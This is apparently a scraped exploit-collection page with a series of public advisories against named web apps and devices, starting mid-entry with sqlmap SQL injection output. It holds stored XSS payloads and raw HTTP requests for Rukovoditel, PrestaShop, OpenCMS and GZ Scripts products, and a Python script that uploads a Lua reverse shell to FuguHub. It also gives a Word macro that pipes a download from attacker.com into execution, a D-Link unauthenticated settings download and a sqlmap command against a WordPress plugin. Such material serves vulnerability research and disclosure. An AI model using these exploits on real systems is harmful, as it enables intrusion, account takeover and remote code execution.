(CASE WHEN (6374=6374) THEN 6374 ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign In} 3.Execute the SQL Injection payload. As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges. Sqlmap results: POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y sqlmap identified the following injection point(s) with a total of 793 HTTP(s) requests: --- Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)-- rvYF&password=test&login=Sign In --- [15:58:56] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.2.4, Apache 2.4.56 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
HireHackking

Rukovoditel 3.4.1 - Multiple Stored XSS

HACKER · %s · %s

Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS Version: 3.4.1 Bugs: Multiple Stored XSS Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 24-06-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== ###XSS-1### ======================================== steps: 1. login to account 2. create project (http://localhost/index.php?module=items/items&path=21) 3. add task 4. open task 5. add comment as "<iframe src="https://14.rs"></iframe> " POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 241 Origin: http://localhost Connection: close Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1 Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments= =========================== ###XSS-2### =========================== 1.go to admin account 2.go to configration => applicaton 3.Copyright Text set as "<img src=x onerror=alert(1)>" POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769 Content-Length: 2766 Origin: http://localhost Connection: close Referer: http://localhost/index.php?module=configuration/application Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="form_session_token" ju271AAoy1 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_NAME]" Rukovoditel -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]" ffgsdfgsdfg -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]" ruko -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="APP_LOGO"; filename="" Content-Type: application/octet-stream -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LOGO]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LOGO_URL]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="APP_FAVICON"; filename="" Content-Type: application/octet-stream -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_FAVICON]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]" <img src=x onerror=alert(1)> -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LANGUAGE]" english.php -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SKIN]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_TIMEZONE]" America/New_York -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]" 10 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]" m/d/Y -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]" m/d/Y H:i -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]" 2/./* -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]" 0 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]" 0 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]" 0 -----------------------------12298384558648010343132232769--
HireHackking

Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS) # Date: 2023-06-23 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : webapps # Dork : /print.php?nm_member= # Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html # Tested on: Windows/Linux # CVE : CVE-2023-36346 import requests import urllib.parse # Set the target URL and payload url = "http://example.com/print.php" payload = "<script>alert('XSS')</script>" # Encode the payload for URL inclusion payload = urllib.parse.quote(payload) # Build the request parameters params = { "nm_member": payload } # Send the request and print the response response = requests.get(url, params=params) print(response.text)
HireHackking

FuguHub 8.1 - Remote Code Execution

HACKER · %s · %s

# Exploit Title: FuguHub 8.1 - Remote Code Execution # Date: 6/24/2023 # Exploit Author: redfire359 # Vendor Homepage: https://fuguhub.com/ # Software Link: https://fuguhub.com/download.lsp # Version: 8.1 # Tested on: Ubuntu 22.04.1 # CVE : CVE-2023-24078 import requests from bs4 import BeautifulSoup import hashlib from random import randint from urllib3 import encode_multipart_formdata from urllib3.exceptions import InsecureRequestWarning import argparse from colorama import Fore requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) #Options for user registration, if no user has been created yet username = 'admin' password = 'password' email = 'admin@admin.com' parser = argparse.ArgumentParser() parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True) parser.add_argument("-rp","--rport", help = "http port [Default 80]") parser.add_argument("-l","--lhost", help = "Your IP", required = True) parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True) args = parser.parse_args() LHOST = args.lhost LPORT = args.lport url = args.rhost if args.rport != None: port = args.rport else: port = 80 def main(): checkAccount() def checkAccount(): print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...") s = requests.Session() # Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp") soup = BeautifulSoup(r.content, 'html.parser') search = soup.find('h1') if r.status_code == 404: print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port") exit(0) userExists = False userText = 'User database already saved' for i in search: if i.string == userText: userExists = True if userExists: print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..") login(r,s) else: print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}") createUser(r,s) login(r,s) def createUser(r,s): data = { email : email , 'user' : username , 'password' : password , 'recoverpassword' : 'on' } r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data) print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!") def login(r,s): print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...") data = {'ba_username' : username , 'ba_password' : password} r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz #Veryify login login_Success_Title = 'Web-File-Server' soup = BeautifulSoup(r.content, 'html.parser') search = soup.find('title') for i in search: if i != login_Success_Title: print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...") exit(0) print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...") exploit(r,s) def exploit(r,s): #Find the file server, default is fs r = s.get(f"https://{url}:443/fs/cmsdocs/") code = r.status_code if code == 404: print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ") exit(0) print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell") #Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' file_content = f''' <h2> Check ur nc listener on the port you put in <h2> <?lsp if request:method() == "GET" then ?> <?lsp {shell} ?> <?lsp else ?> Wrong request method, goodBye! <?lsp end ?> ''' files = {'file': ('rev.lsp', file_content, 'application/octet-stream')} r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files) if r.text == 'ok' : print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ") r = s.get(f"https://{url}:443/rev.lsp") if __name__=='__main__': try: main() except: print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")
HireHackking
## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 04.17.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/ ## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ ## CVE-2023-28285 ## Description: The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim's computer. The attacker can trick the victim to open a malicious web page by using a malicious `Word` file for `Office-365 API`. After the user will open the file to read it, from the API of Office-365, without being asked what it wants to activate, etc, he will activate the code of the malicious server, which he will inject himself, from this malicious server. Emedietly after this click, the attacker can receive very sensitive information! For bank accounts, logs from some sniff attacks, tracking of all the traffic of the victim without stopping, and more malicious stuff, it depends on the scenario and etc. STATUS: HIGH Vulnerability [+]Exploit: The exploit server must be BROADCASTING at the moment when the victim hit the button of the exploit! [+]PoC: ```cmd Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus) End Sub ``` ## FYI: The PoC has a price and this report will be uploaded with a description and video of how you can reproduce it only. ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html) ## Time spend: 01:30:00
HireHackking

D-Link DAP-1325 - Broken Access Control

HACKER · %s · %s

# Exploit Title: D-Link DAP-1325 - Broken Access Control # Date: 27-06-2023 # Exploit Author: ieduardogoncalves # Contact : twitter.com/0x00dia # Vendor : www.dlink.com # Version: Hardware version: A1 # Firmware version: 1.01 # Tested on:All Platforms 1) Description Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication. IN MY CASE, Tested repeater IP: http://192.168.0.21/ Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0 2) Proof of Concept Step 1: Go to Repeater Login Page : http://192.168.0.21/ Step 2: Add the payload to URL. Payload: http://{ip}/cgi-bin/ExportSettings.sh Payload: https://github.com/eeduardogoncalves/exploit
HireHackking
# Exploit Title: Time Slot Booking Calendar 1.8 - Stored XSS # Date: 29/06/2023 # Exploit Author: CraCkEr # Vendor: GZ Scripts # Vendor Homepage: https://gzscripts.com/ # Software Link: https://gzscripts.com/time-slot-booking-calendar-php.html # Version: 1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Release Notes: Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. ## Stored XSS ----------------------------------------------- POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1 promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'phone' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on [+] near Start/End Time - Press [Booking] 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Phone" 5. Inject your [XSS Payload] in "Address Line 1" 6. Inject your [XSS Payload] in "Country" 7. Accept with terms & Press [Booking] XSS Fired on Local User Browser 8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser 10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index) XSS Will Fire and Executed on his Browser [-] Done
HireHackking

Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS) # Date: 30/06/2023 # Exploit Author: CraCkEr # Vendor: GZ Scripts # Vendor Homepage: https://gzscripts.com/ # Software Link: https://gzscripts.com/vacation-rental-website.html # Version: 1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Stored XSS ------------------------------------------------------------ POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1 property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj ------------------------------------------------------------ POST parameter 'username' is vulnerable to XSS POST parameter 'title' is vulnerable to XSS POST parameter 'comment' is vulnerable to XSS ## Steps to Reproduce: 1. Surf (as Guest) - Go to any Listed Property 2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews) 3. Inject your [XSS Payload] in "Username" 4. Inject your [XSS Payload] in "Title" 5. Inject your [XSS Payload] in "Comment" 6. Submit 7. XSS Fired on Local Browser 8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page] Note: I think Administration Panel missing a section to Manage [Reviews] on the website this feature must be added in next Updates [View/Edit/Delete]
HireHackking

WP AutoComplete 1.0.4 - Unauthenticated SQLi

HACKER · %s · %s

# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi # Date: 30/06/2023 # Exploit Author: Matin nouriyan (matitanium) # Version: <= 1.0.4 # CVE: CVE-2022-4297 Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/ # Tested on: Kali linux --------------------------------------- The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users, leading to an unauthenticated SQL injection -------------------------------------- How to Reproduce this Vulnerability: 1. Install WP AutoComplete <= 1.0.4 2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests 3. Find requests belong to WP AutoComplete like step 5 4. Start sqlmap and exploit 5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
HireHackking

Prestashop 8.0.4 - Cross-Site Scripting (XSS)

HACKER · %s · %s

Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS) Application: prestashop Version: 8.0.4 Bugs: Stored XSS Technology: PHP Vendor URL: https://prestashop.com/ Software Link: https://prestashop.com/prestashop-edition-basic/ Date of found: 30.06.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to Catalog => Products 2. Select arbitary product 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1 Host: localhost Content-Length: 756 sec-ch-ua: sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Accept: application/json Cache-Control: no-cache X-Requested-With: XMLHttpRequest sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55 Connection: close ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="path" ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="path_thumb" ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="file"; filename="malas.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--
HireHackking

Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS) # Date: 1/07/2023 # Exploit Author: tmrswrr # Vendor Homepage: http://www.opencms.org # Software Link: https://github.com/alkacon/opencms-core # Version: v15.0 POC: 1 ) Login in demo page , go to this url https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!! 2 ) Click /.galleries/ , after right click any png file , open gallery, write in search button this payload <img src=. onerror=alert(document.domain)> 3 ) You will be see alert box POC: 1 ) Go to this url , right click any png file, rename title section and write your payload : <img src=. onerror=alert(document.domain)> https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!! 2 ) You will be see alert box , stored xss POC: 1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file after save it svg file: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("XSS"); </script> </svg> 2 ) When click this svg file you will be see alert button